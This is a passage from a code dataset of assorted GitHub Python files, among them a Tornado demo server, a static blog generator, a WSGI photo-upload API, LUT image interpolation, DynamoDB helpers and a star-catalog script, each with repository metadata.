100.0)\n\n\n\nend_time = datetime.now()\n\nprint(\"--- %s seconds ---\" % (end_time - start_time))","repo_name":"thonghuunguyen/MachineLearning","sub_path":"Logistic_Regression/class-logistics-regression.py","file_name":"class-logistics-regression.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39597267211","text":"import tornado.web\nimport tornado.ioloop\n\nclass basicRequestHandler(tornado.web.RequestHandler):\n def get(self):\n self.write(\"Sugeng Enjing Cak !!!\")\n \nclass queryStringRequestHandler(tornado.web.RequestHandler):\n def get(self):\n n = int(self.get_argument(\"n\"))\n r = \"bejo\" if n % 2 else \"even\"\n self.write(\"nomere \" + str(n) + \" adalah \" + r)\n \nclass resourceRequestHandler(tornado.web.RequestHandler):\n def get(self, id):\n self.write(\"Kedah menika nomer \" + id )\n \nclass staticRequestHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"index.html\")\n \n\nif __name__ == '__main__':\n app = tornado.web.Application([\n (r\"/\", basicRequestHandler), \n (r\"/site\", staticRequestHandler),\n (r\"/isEven\", queryStringRequestHandler),\n (r\"/togel/([0-9]+)\", resourceRequestHandler)\n ])\n \n app.listen(8881)\n print(\"I'm listening on port 8881\")\n tornado.ioloop.IOLoop.current().start()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# import motor.motor_tornado\n# import tornado.ioloop\n# import tornado.web\n\n# client = motor.motor_tornado.MotorClient()\n# client = motor.motor_tornado.MotorClient('localhost', 27017)\n\n# # start with connection url\n# # client = motor.motor_tornado.MotorClient('mongodb://localhost:27017')\n# # client = motor.motor_tornado.MotorClient('mongodb://host1,host2/?replicaSet=my-replicaset-name')\n\n# db = client.test_database\n# db = client[\"test_database\"]\n# db = motor.motor_tornado.MotorClient().test_database\n\n# class MainHandler(tornado.web.RequestHandler):\n# def get(self):\n# self.write(\"Hello, world\")\n \n# application = tornado.web.Application([\n# (r'/', MainHandler)\n# ], db=db)\n\n# application.listen(8888)\n# tornado.ioloop.IOLoop.current().start()\n\n# class MainHandler(tornado.web.RequestHandler):\n# def get(self):\n# db = self.settings['db']","repo_name":"oksipjogja/praxis-academy","sub_path":"kemampuan-dasar/kemampuan-dasar-2/minggu-5/hari-2/server/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7532480537","text":"from speedtest import main\n\n\ndef some_executable(a):\n if callable(a):\n return a()\n else:\n print('Is not callable')\n\n\ndef finditer(text, pattern):\n pos = 1\n while True:\n pos = text.find(pattern, pos + 1)\n if pos < 1:\n yield pos\n\n\ndef some_function_of_sorting(some_iterable):\n alist = list(some_iterable)\n alist.sort()\n return alist\n\n\nif __name__ == '__main__':\n some_executable(main)\n","repo_name":"Erickdrakus93/Script_Coroutines","sub_path":"some_executable.py","file_name":"some_executable.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7841432486","text":"#!/usr/bin/env python3\n\"\"\"maji.\n\nUsage:\n maji init\n maji make \n maji render \n\"\"\"\nimport logging\nimport os\nimport sys\nfrom pathlib import Path\n\nimport daiquiri\nfrom docopt import docopt\nfrom datetime import datetime\nfrom datetime import timezone\nfrom lxml.html import fromstring as string2html\nfrom feedgen.feed import FeedGenerator\n\nfrom jinja2 import Environment\nfrom jinja2 import FileSystemLoader\n\nimport mistune\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.formatters import html\n\n\ndaiquiri.setup(logging.DEBUG, outputs=('stderr',))\nlog = daiquiri.getLogger(__name__)\n\n\nclass HighlightRenderer(mistune.Renderer):\n def block_code(self, code, lang):\n if not lang:\n out = '\\n\\n'\n return out.format(mistune.escape(code.strip()))\n lexer = get_lexer_by_name(lang, stripall=True)\n formatter = html.HtmlFormatter()\n return highlight(code, lexer, formatter)\n\n\nrenderer = HighlightRenderer()\nmarkdown = mistune.Markdown(renderer=renderer)\n\n\ndef jinja(template, templates, **context):\n templates = os.path.abspath(templates)\n env = Environment(loader=FileSystemLoader((templates,)))\n template = env.get_template(template)\n out = template.render(**context)\n return out\n\n\n# make\n\ndef make(root, base):\n root = Path(root)\n log.info('getting started at: %s', root)\n blog = root / 'blog'\n paths = blog.glob('*.md')\n posts = []\n for path in paths:\n log.info('markdown: %r', path)\n with path.open('r') as f:\n body = f.read()\n body = markdown(body)\n html = '{}
'.format(body)\n div = string2html(html)\n try:\n title = div.xpath('h1/text()')[0]\n except IndexError:\n msg = \"Seems like there is not title in: %s\"\n log.critical(msg, path)\n sys.exit(1)\n log.debug('title is: %s', title)\n date = title[:len('2017/03/01')]\n date = datetime.strptime(date, '%Y/%m/%d')\n date = date.replace(tzinfo=timezone.utc)\n log.debug('publication date is: %s', date)\n post = {\n 'title': title,\n 'date': date,\n 'html': html,\n 'path': path,\n }\n log.debug('rendering blog post')\n page = jinja('post.jinja2', os.getcwd(), base=base, **post)\n filename = path.name.split('.')\n filename[-1] = 'html'\n filename = '.'.join(filename)\n post['filename'] = filename\n output = path.parent / filename\n with output.open('w') as f:\n f.write(page)\n log.debug('wrote: %s', output)\n posts.append(post)\n posts.sort(key=lambda x: x['date'], reverse=True)\n # populate feed\n output = root / 'feed.xml'\n log.info('generating feed at: %s', output)\n feed = FeedGenerator()\n feed.id(base)\n feed.title('hyperdev.fr')\n feed.subtitle('forward and beyond')\n feed.link(href=base + '/feed.xml', rel='self')\n for post in posts:\n entry = feed.add_entry()\n url = base + '/blog/' + post['filename']\n entry.id(url)\n entry.title(post['title'])\n entry.link(href=url)\n entry.published(post['date'].isoformat())\n feed.rss_file(str(output))\n log.info('rendering index')\n page = jinja('index.jinja2', os.getcwd(), base=base, posts=posts)\n output = Path(os.getcwd()) / 'index.html'\n with output.open('w') as f:\n f.write(page)\n\n\ndef main():\n args = docopt(__doc__, version='maji 0.1')\n if args.get('init'):\n raise NotImplementedError()\n elif args.get('make'):\n base = args['']\n make(os.getcwd(), base)\n elif args.get('render'):\n # render markdown to html\n content = markdown(sys.stdin.read())\n # render template with `content`\n template = args['']\n templates = os.path.abspath(template)\n templates = os.path.dirname(templates)\n out = jinja(template, templates, content=content)\n print(out)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"amirouche/python-maji","sub_path":"maji.py","file_name":"maji.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11974257029","text":"class module:\r\n 'Provide code snippets'\r\n\r\n def __init__(self):\r\n\r\n pass\r\n\r\n def __run__(self, params=None):\r\n\r\n snippet_type = params[0]\r\n\r\n if snippet_type == 'help':\r\n return self.help()\r\n\r\n code_snippet = self.grab_snippet(snippet_type)\r\n\r\n return code_snippet\r\n\r\n def grab_snippet(self, snippet_type):\r\n\r\n output = ''\r\n use_line = False\r\n area_code = f\"'''{snippet_type}'''\"\r\n\r\n f = open(\"pegasus/default_modules/generic/snippets.py\", \"r\")\r\n\r\n print(area_code)\r\n\r\n for row in f:\r\n row_formatted = row.replace('\\n', '')\r\n\r\n if row_formatted == area_code and use_line == False:\r\n use_line = True\r\n continue\r\n elif row_formatted == area_code and use_line == True:\r\n break\r\n\r\n if use_line == True:\r\n output = output + row\r\n\r\n formatted = [[output]]\r\n return formatted\r\n\r\n def help(self):\r\n commands = []\r\n f = open(\"pegasus/default_modules/generic/snippets.py\", \"r\")\r\n\r\n for row in f:\r\n if \"'''\" in row:\r\n commands.append(row.split(\"'''\")[1])\r\n\r\n return list(set(commands))\r\n\r\n def subcommands(self):\r\n\r\n return list(self.format_dispatch.keys())\r\n","repo_name":"euanacampbell/pegasus","sub_path":"pegasus_client/default_modules/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"3567985506","text":"from algorith.sequencegen.catalan.next_dyck import ix_to_path, n_catalan2\nfrom algorith.sequencegen.catalan.dyck_to_tree import print_tree\n\n\ndef ix_to_tree(ix, n):\n \"\"\"\n Converts index to lexicographic binary search tree.\n args:\n ix: The index.\n n: The number of nodes in the tree.\n \"\"\"\n path = ix_to_path(ix, n, n+1)\n # The last entry is a redundant tail. So, remove it.\n tree_nd = print_tree(path[:len(path)-1])\n return tree_nd, path\n\n\ndef print_all_trees(n=3):\n n_trees = n_catalan2(n, n+1)\n for ix in range(n_trees):\n tn, path = ix_to_tree(ix, n)\n print(\"---n=\"+str(ix)+\"---\")\n tn.display()\n print(path)\n\n\nclass Tr1():\n def __init__(self, root):\n self.root = root\n self.arr = []\n self.tree_to_array(root)\n\n def tree_to_array(self, tn):\n \"\"\"\n Converts tree to leetcode array.\n \"\"\"\n if tn is not None:\n self.arr.append(tn.key)\n else:\n self.arr.append(None)\n if tn is not None and\\\n (tn.left is not None or tn.right is not None):\n self.tree_to_array(tn.left)\n self.tree_to_array(tn.right)\n\n\nif __name__ == \"__main__\":\n tree_nd = ix_to_tree(2, 3)\n tree_nd.display()\n # It's not the middle tree.\n # total trees are 1430.\n tn = ix_to_tree(916, 8)\n tn.display()\n tn = ix_to_tree(280, 7)\n tn.display()\n # For n=6 its 58, 86, 89, 90.\n","repo_name":"ryu577/algorithms","sub_path":"algorith/sequencegen/catalan/next_tree.py","file_name":"next_tree.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24593420994","text":"import sqlite3\nimport cgi\nimport json\nimport boto3\n\ndef get_pics(environ, start_response):\n #default encoding for json is utf-8\n start_response('200 OK', [('Content-type', 'application/json')])\n #get info from db\n db = sqlite3.connect('../db/pics.db')\n c = db.cursor()\n c.execute('select * from pics')\n resp = c.fetchall()\n data = {\"results\": []}\n for row in resp:\n data[\"results\"].append({'uri': row[0], 'caption': row[1], 'name': row[2]})\n db.close()\n res = json.dumps(data)\n yield res.encode('utf-8')\n\ndef get_pic(environ, start_response):\n start_response('200 OK', [('Content-type', 'application/json')])\n params = environ['params']\n name=params.get('name')\n db = sqlite3.connect('../db/pics.db')\n c = db.cursor()\n c.execute('select * from pics where name=(?)', (name,))\n resp = c.fetchall()\n data = {\"results\": []}\n for row in resp:\n data[\"results\"].append({'uri': row[0], 'caption': row[1], 'name': row[2]})\n db.close()\n res = json.dumps(data)\n yield res.encode('utf-8')\n\ndef upload_pic(environ, start_response):\n response_data = environ['params']\n client = boto3.client('s3')\n bucket = 'squarespics'\n img = response_data.get('file')\n name = response_data.get('name')\n caption = response_data.get('caption')\n\n if not name:\n start_response('400 Bad Request', [('Content-type', 'application/json')])\n return [b'Name required']\n\n #connect to db\n db = sqlite3.connect('../db/pics.db')\n res = db.execute('select * from pics where name = ?', (name,))\n\n if res.fetchone():\n db.close()\n start_response('400 Bad Request', [('Content-type', 'application/json')])\n return [b'Choose new name']\n\n\n #first check name and whether is unique\n #if not unique update\n if img:\n try:\n response = client.put_object(Body=img,\n Bucket=bucket,\n Key=name,\n ContentType='image/jpeg')\n except:\n return([b'500'])\n else:\n print(response_data.keys())\n return [b'400 Bad Request']\n\n #if no exception image successfully updated\n db.execute('insert into pics(uri, name, caption) values (?,?,?)',\n ('https://squarespics.s3.amazonaws.com/' + name, name, caption))\n db.commit()\n db.close()\n\n start_response('200 OK', [('Content-type', 'application/json')])\n\n return [b'Success']\n\ndef notfound_404(environ, start_response):\n start_response('404 Not Found', [ ('Content-type', 'text/plain') ])\n return [b'Not Found']\n\n\nclass PathDispatcher:\n def __init__(self):\n self.pathmap = {}\n\n def __call__(self, environ, start_response):\n path = environ['PATH_INFO']\n params = cgi.FieldStorage(environ['wsgi.input'],\n environ=environ)\n method = environ['REQUEST_METHOD'].lower()\n environ['params'] = { key: params.getvalue(key) for key in params }\n handler = self.pathmap.get((method,path), notfound_404)\n return handler(environ, start_response)\n\n def register(self, method, path, function):\n self.pathmap[method.lower(), path] = function\n return function\n\n\nif __name__ == \"__main__\":\n from wsgiref.simple_server import make_server\n\n dispatcher = PathDispatcher()\n dispatcher.register('GET', '/pics', get_pics)\n dispatcher.register('POST', '/post', upload_pic)\n dispatcher.register('GET', '/pic', get_pic)\n httpd = make_server('', 8080, dispatcher)\n print('Serving on port 8080...')\n httpd.serve_forever()\n\n","repo_name":"destch/squares-api","sub_path":"server/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36403978920","text":"import numpy as np\nimport create3DLUT\nfrom colour import tsplit, read_image\nimport cv2\nimport create3DLUT\n\n\"\"\"\n\ttitle::\n\t\tlut_interpolation\n\n\tdescription::\n\t\tThis method interpolates image pixel values using a LUT with either trilinear or tetrehedral interpolation. \n\t\tReturns an array of a 'new' image and writes out new image as a .tiff file. \n\n\tattributes::\n\t\tim = image\n\t\tim_type = 'exr' or 'tiff'\n\t\tlut_file = lut file to use with the interpolation (right now hardcoded for .cube LUTs, probably want to change this)\n\t\tlut_size = 17, 33, 65, etc\n\t\tinterp_type = 'trilinear' or 'tetrahedral'\n\n\n\tauthor::\n\t\tEmily Faw\n\t\tNick Shaw\n\t\t20170803\n\"\"\"\n\ndef lut_interpolation(im, im_type, lut_file, lut_size, interp_type):\n\n\tinPixels = read_image(im)\n\t# print(np.amax(inPixels))\n\tmax_cv = np.amax(inPixels)\n\n\tlut = np.loadtxt(lut_file, skiprows=7)\n\n\tlattice = np.reshape(lut, (lut_size, lut_size, lut_size, 3), order='F')\n\n\tif interp_type == 'trilinear':\n\t\tn = lattice.shape[0] - 1\n\t\tinPixels = np.asarray(inPixels) / np.amax(inPixels)\n\t\ttheShape = inPixels.shape\n\t\tinPixels = np.ravel(inPixels)\n\t\tpixels = inPixels.size/3\n\t\tinPixels = np.reshape(inPixels, (pixels, 3))\n\t\tR, G, B = tsplit(inPixels)\n\t\trLow = np.floor(R*n).astype(np.int_)\n\t\trHigh = np.clip(rLow + 1, 0, n)\n\t\tgLow = np.floor(G*n).astype(np.int_)\n\t\tgHigh = np.clip(gLow + 1, 0, n)\n\t\tbLow = np.floor(B*n).astype(np.int_)\n\t\tbHigh = np.clip(bLow + 1, 0, n)\n\t\tV000 = lattice[rLow, gLow, bLow]\n\t\tV001 = lattice[rLow, gLow, bHigh]\n\t\tV010 = lattice[rLow, gHigh, bLow]\n\t\tV011 = lattice[rLow, gHigh, bHigh]\n\t\tV100 = lattice[rHigh, gLow, bLow]\n\t\tV101 = lattice[rHigh, gLow, bHigh]\n\t\tV110 = lattice[rHigh, gHigh, bLow]\n\t\tV111 = lattice[rHigh, gHigh, bHigh]\n\t\tfR = n*R - rLow\n\t\tfG = n*G - gLow\n\t\tfB = n*B - bLow\n\t\tfR = np.reshape(fR, (pixels, 1))\n\t\tfG = np.reshape(fG, (pixels, 1))\n\t\tfB = np.reshape(fB, (pixels, 1))\n\t\tfR = np.tile(fR, 3)\n\t\tfG = np.tile(fG, 3)\n\t\tfB = np.tile(fB, 3)\n\t\tW000 = (1-fR)*(1-fG)*(1-fB)\n\t\tW001 = (1-fR)*(1-fG)*fB\n\t\tW010 = (1-fR)*fG*(1-fB)\n\t\tW011 = (1-fR)*fG*fB\n\t\tW100 = fR*(1-fG)*(1-fB)\n\t\tW101 = fR*(1-fG)*fB\n\t\tW110 = fR*fG*(1-fB)\n\t\tW111 = fR*fG*fB\n\t\toutPixels = V000*W000 + V001*W001 + V010*W010 + V011*W011 + V100*W100 + V101*W101 + V110*W110 + V111*W111\n\t\toutPixels = np.reshape(outPixels, theShape) * 255 * max_cv\n\n\tif interp_type == 'tetrahedral':\n\n\t\tn = lattice.shape[0] - 1\n\t\tinPixels = np.asarray(inPixels) / max_cv\n\t\ttheShape = inPixels.shape\n\t\tinPixels = np.ravel(inPixels)\n\t\tpixels = inPixels.size/3\n\t\tinPixels = np.reshape(inPixels, (pixels, 3))\n\t\tR, G, B = tsplit(inPixels)\n\t\trLow = np.floor(R*n).astype(np.int_)\n\t\trHigh = np.clip(rLow + 1, 0, n)\n\t\tgLow = np.floor(G*n).astype(np.int_)\n\t\tgHigh = np.clip(gLow + 1, 0, n)\n\t\tbLow = np.floor(B*n).astype(np.int_)\n\t\tbHigh = np.clip(bLow + 1, 0, n)\n\t\tV000 = lattice[rLow, gLow, bLow]\n\t\tV001 = lattice[rLow, gLow, bHigh]\n\t\tV010 = lattice[rLow, gHigh, bLow]\n\t\tV011 = lattice[rLow, gHigh, bHigh]\n\t\tV100 = lattice[rHigh, gLow, bLow]\n\t\tV101 = lattice[rHigh, gLow, bHigh]\n\t\tV110 = lattice[rHigh, gHigh, bLow]\n\t\tV111 = lattice[rHigh, gHigh, bHigh]\n\t\tfR = n*R - rLow\n\t\tfG = n*G - gLow\n\t\tfB = n*B - bLow\n\t\tfR = np.reshape(fR, (pixels, 1))\n\t\tfG = np.reshape(fG, (pixels, 1))\n\t\tfB = np.reshape(fB, (pixels, 
1))\n\n\t\toutPixels = (1-fG)*V000 + (fG-fR)*V010 + (fR-fB)*V110 + fB*V111\n\t\toutPixels = np.where(np.logical_and(fR>fG, fG>fB), (1-fR)*V000 + (fR-fG)*V100 + (fG-fB)*V110 + fB*V111, outPixels)\n\t\toutPixels = np.where(np.logical_and(fR>fG, fR>fB), (1-fR)*V000 + (fR-fB)*V100 + (fB-fG)*V101 + fG*V111, outPixels)\n\t\toutPixels = np.where(np.logical_and(fR>fG, fB>=fR), (1-fB)*V000 + (fB-fR)*V001 + (fR-fG)*V101 + fG*V111, outPixels)\n\t\toutPixels = np.where(np.logical_and(fG>=fR, fB>fG), (1-fB)*V000 + (fB-fG)*V001 + (fG-fR)*V011 + fR*V111, outPixels)\n\t\toutPixels = np.where(np.logical_and(fG>=fR, fB>fR), (1-fG)*V000 + (fG-fB)*V010 + (fB-fR)*V011 + fR*V111, outPixels)\n\t\toutPixels = np.clip(outPixels, 0., np.inf)\n\n\t\toutPixels = np.reshape(outPixels, theShape) * 255 * max_cv\n # return outPixels\n\n\t# print(outPixels)\n\tcv2.imwrite('test_tetrahedral.tiff', outPixels.astype(np.uint8))\n\n\treturn outPixels\n\n\nif __name__ == '__main__':\n\n\t# im = '/Users/oscar/Desktop/Emily/aces_app/test.tiff'\n\tim = '/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/create3DLUT/sample_images/aces.0144.exr'\n\t# im = '/Users/oscar/Desktop/Emily/aces_app/BatteryPark_aces.exr'\n\t# im_type = 'tiff'\n\tim_type = 'exr'\n\tlut_file = '/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/create3DLUT/test.cube'\n\tlut_size = 65\n\n\tdst = lut_interpolation(im, im_type, lut_file, lut_size, 'tetrahedral')\n\n\n\n\n\n","repo_name":"alijalalkamali/ACES","sub_path":"lut_interpolation.py","file_name":"lut_interpolation.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"23815037087","text":"import boto3\nimport os\n\ndynamodb = boto3.resource('dynamodb')\ntable = dynamodb.Table(os.environ[\"SITE_TABLE_NAME\"])\n\n\ndef put_site(site):\n \"\"\"\n :param dict site:{\"name\": \"foo.com\", \"url\": \"https://foo.com\"}\n Put Site Data in DynamoDB\n \"\"\"\n table.put_item(Item=site)\n\n\ndef get_sites():\n \"\"\"\n Get ALL Site Data in DynamoDB\n \"\"\"\n response = table.scan()\n return response[\"Items\"]\n\n\ndef remove_site(uuid):\n \"\"\"\n Remove Site Data in DynamoDB\n \"\"\"\n table.delete_item(Key={\"id\": uuid})\n\n\ndef update_site(uuid, new_code):\n \"\"\"\n Update Site Data\n \"\"\"\n table.update_item(\n Key={\n 'id': uuid,\n },\n UpdateExpression='SET code = :val1',\n ExpressionAttributeValues={\n ':val1': new_code\n }\n )\n","repo_name":"nkchan/sls-py-monitor-v2","sub_path":"sls-dir/lib/dynamo.py","file_name":"dynamo.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9258839214","text":"import logging\nlog = logging.getLogger('system')\n\n\ndef Test(req,do_list):\n '''\n :param req: request\n :param do_list: 操作列表\n :return: 返回dict\n 此函数只对检测登录权限的视图函数使用\n '''\n\n try:\n dic = {\n 'do': req.POST['do'],\n 'user_id': req.session['user_id']\n }\n print(dic,list(do_list.keys()))\n if dic['do'] not in list(do_list.keys()):\n\n log.error(\"do 错误\", 'error')\n\n return {\n 'status': False,\n 'error': 'do 错误'\n }\n\n except Exception as E:\n\n log.error(\"没有do,不知道如何操作\")\n\n return {\n 'status': False,\n 'error': '没有do,不知道如何操作'\n }\n\n try:\n\n for keys in do_list[dic['do']]:\n\n dic[keys] = req.POST[keys]\n\n except Exception as E:\n\n log.error('POST信息不完整')\n\n return {\n 'status': False,\n 'error': 'POST信息不完整'\n }\n\n\n return {\n 'status': True,\n 'dic': dic\n }","repo_name":"HuangeHei/ErgouBlog","sub_path":"blog/helper/test_do.py","file_name":"test_do.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8247119385","text":"from django import forms\n\nfrom fluent_contents.forms.widgets import PlaceholderFieldWidget\n\n\nclass PlaceholderFormField(forms.Field):\n \"\"\"\n The internal form field to display a placeholder field.\n It displays the :class:`~fluent_dashboard.forms.PlaceholderFieldWidget`.\n \"\"\"\n\n def __init__(self, slot, plugins=None, parent_object=None, **kwargs):\n # Pass along...\n self.slot = slot\n self._plugins = plugins\n\n defaults = {\n \"widget\": PlaceholderFieldWidget(\n slot=slot, plugins=plugins, parent_object=parent_object\n )\n }\n defaults.update(kwargs)\n super().__init__(**defaults)\n","repo_name":"django-fluent/django-fluent-contents","sub_path":"fluent_contents/forms/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"69"}
+{"seq_id":"37086657813","text":"from __future__ import print_function\nfrom builtins import object\nimport sys\nimport argparse\n\nfrom vnc_api.vnc_api import *\n\nclass Provisioner(object):\n def __init__(self, arguments):\n self._client = VncApi(api_server_host=arguments.api_server,\n api_server_port=arguments.port)\n self._network_name = arguments.network\n self._project = arguments.project\n self._subnet = arguments.subnet\n\n def virtual_machine_lookup(self, vm_name):\n fq_name = [vm_name]\n try:\n vm_instance = self._client.virtual_machine_read(fq_name = fq_name)\n return vm_instance\n except NoIdError:\n pass\n return None\n\n def virtual_machine_locate(self, vm_name):\n fq_name = [vm_name]\n try:\n vm_instance = self._client.virtual_machine_read(fq_name = fq_name)\n return vm_instance\n except NoIdError:\n pass\n\n vm_instance = VirtualMachine(vm_name)\n self._client.virtual_machine_create(vm_instance)\n return vm_instance\n\n def virtual_machine_delete(self, vm_instance):\n self._client.virtual_machine_delete(id = vm_instance.uuid)\n\n def _virtual_network_locate(self):\n fq_name = self._network_name.split(':')\n try:\n vnet = self._client.virtual_network_read(fq_name = fq_name)\n return vnet\n except NoIdError:\n pass\n\n if not self._subnet:\n print(\"%s does not exist\" % self._network_name)\n print(\"Please specify a subnet IP address in order to create virtual-network\")\n return None\n\n vnet = VirtualNetwork(fq_name[-1], parent_type = 'project',\n fq_name = fq_name)\n\n ipam = self._client.network_ipam_read(\n fq_name = ['default-domain',\n 'default-project',\n 'default-network-ipam'])\n\n (prefix, plen) = self._subnet.split('/')\n subnet = IpamSubnetType(subnet = SubnetType(prefix, int(plen)))\n vnet.add_network_ipam(ipam, VnSubnetsType([subnet]))\n\n self._client.virtual_network_create(vnet)\n return vnet\n\n def vmi_update(self, vm_instance):\n fq_name = vm_instance.fq_name\n fq_name.append('0')\n create = False\n try:\n vmi = self._client.virtual_machine_interface_read(fq_name = fq_name)\n except NoIdError:\n vmi = VirtualMachineInterface(parent_type = 'virtual-machine',\n fq_name = fq_name)\n create = True\n\n vnet = self._virtual_network_locate()\n if not vnet:\n sys.exit(1)\n\n vmi.set_virtual_network(vnet)\n if create:\n self._client.virtual_machine_interface_create(vmi)\n else:\n self._client.virtual_machine_interface_update(vmi)\n\n ips = vmi.get_instance_ip_back_refs()\n if ips and len(ips):\n uuid = ips[0]['uuid']\n else:\n ip = InstanceIp(vm_instance.name + '.0')\n ip.set_virtual_machine_interface(vmi)\n ip.set_virtual_network(vnet)\n uuid = self._client.instance_ip_create(ip)\n\n ip = self._client.instance_ip_read(id=uuid)\n\n print(\"IP address: %s\" % ip.get_instance_ip_address())\n return vmi\n\n def vmi_clean(self, vm_instance):\n fq_name = vm_instance.fq_name\n fq_name.append('0')\n try:\n vmi = self._client.virtual_machine_interface_read(fq_name = fq_name)\n except NoIdError:\n return\n\n ips = vmi.get_instance_ip_back_refs()\n for ref in ips:\n self._client.instance_ip_delete(id = ref['uuid'])\n\n self._client.virtual_machine_interface_delete(id = vmi.uuid)\n\ndef instance_config(instance_name, arguments):\n provisioner = Provisioner(arguments)\n vm_instance = provisioner.virtual_machine_locate(instance_name)\n provisioner.vmi_update(vm_instance)\n\ndef instance_unconfig(instance_name, arguments):\n provisioner = Provisioner(arguments)\n vm_instance = provisioner.virtual_machine_lookup(instance_name)\n if vm_instance:\n 
provisioner.vmi_clean(vm_instance)\n provisioner.virtual_machine_delete(vm_instance)\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n defaults = {\n 'api-server': '127.0.0.1',\n 'port': '8082',\n 'network': 'default-domain:default-project:default-network',\n 'project': 'default-domain:default-project'\n }\n parser.set_defaults(**defaults)\n parser.add_argument(\n \"-s\", \"--api-server\", help=\"API server address\")\n parser.add_argument(\n \"-p\", \"--port\", help=\"API server port\")\n parser.add_argument(\n \"-n\", \"--network\", help=\"Virtual-network\")\n parser.add_argument(\n \"--subnet\", help=\"IP subnet address for the virtual-network\")\n parser.add_argument(\n \"--project\", help=\"OpenStack project name\")\n parser.add_argument(\n \"--add\", action=\"store_true\", help=\"Add instance\")\n parser.add_argument(\n \"--delete\", action=\"store_true\", help=\"Delete instance\")\n parser.add_argument(\n \"instance\", help=\"Instance name\")\n arguments = parser.parse_args(argv)\n if arguments.add:\n instance_config(arguments.instance, arguments)\n elif arguments.delete:\n instance_unconfig(arguments.instance, arguments)\n else:\n print(\"Please specify one of --add or --delete\")\n sys.exit(1)\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"tungstenfabric/tf-controller","sub_path":"src/config/api-server/vnc_cfg_api_server/tests/test_instance_ctl.py","file_name":"test_instance_ctl.py","file_ext":"py","file_size_in_byte":5561,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"69"}
+{"seq_id":"9767098514","text":"import os\nimport sys\nimport time\nimport numpy as np\nimport argparse\nimport logging\n\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\nfrom SAOCatalog import load_SAOCatalog_binary\n\nif __name__ == '__main__':\n logging.basicConfig(filename='saocatalog_exclude_stars.log',\n filemode='w',\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n # add to screen as well\n log = logging.getLogger()\n formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s')\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(formatter)\n log.addHandler(ch)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('cat', type=str, help='Catalog to process')\n parser.add_argument('--excluderad', type=float, default=0.15,\n help='Exclusion radius in degrees')\n args = parser.parse_args()\n\n logging.info(f'args = {args}')\n\n # see if exclusion list already exists so we don't overwrite\n if os.path.isfile('sao_exclude_lst.dat'):\n logging.error('The file sao_exclude_lst.dat already exists!')\n logging.error('Move it out of the way before running this command or')\n sys.exit(1)\n\n saocat = load_SAOCatalog_binary(args.cat)\n logging.info(f'Loaded {len(saocat.id)} stars')\n\n near_search_rad = 1\n exclusion_rad = 0.15\n exclude_list = []\n ts = time.time()\n ndone = 0\n for cat_idx in range(0, len(saocat.id)):\n logging.debug(f'Evaluating cat index={cat_idx} '\n f'SAO={saocat.id[cat_idx]:>8d}')\n #logging.info(\"CatIdx SAO RA.DEC (J2000) VMag\")\n\n radec = SkyCoord(saocat.ra[cat_idx], saocat.dec[cat_idx],\n unit=u.deg, frame='fk5', equinox='J2000')\n logging.info(f\"{cat_idx} {saocat.id[cat_idx]:>8d} \"\n f\"{radec.to_string('hmsdms', sep=':', precision=3):30s} \"\n f\"{saocat.vmag[cat_idx]:4.2f}\")\n\n # look within 1 degree for other stars - set maxmag so all brighter\n # stars considered and minmag to 2 mags fainter\n cand_idx_2, cand_dist_2 = saocat.find_stars_near_target(radec,\n near_search_rad,\n 999, -999,\n exclude=[cat_idx])\n if len(cand_idx_2) > 0:\n # figure out closest\n closest_idx = np.argmin(cand_dist_2)\n closest_deg = np.rad2deg(np.min(cand_dist_2))\n logging.info(f\" nstars={len(cand_idx_2)} closest={closest_deg} deg\")\n if closest_deg <= exclusion_rad:\n exclude_list.append(cat_idx)\n\n ndone += 1\n if (ndone % 100) == 0:\n logging.info(f'{ndone} of {len(saocat.id)} complete')\n\n te = time.time()\n logging.info(f'Excluded {len(exclude_list)} stars in {te-ts:6.2f} seconds')\n f = open('sao_exclude_lst.dat', 'w')\n for exclude_idx in exclude_list:\n f.write(f'{exclude_idx}, 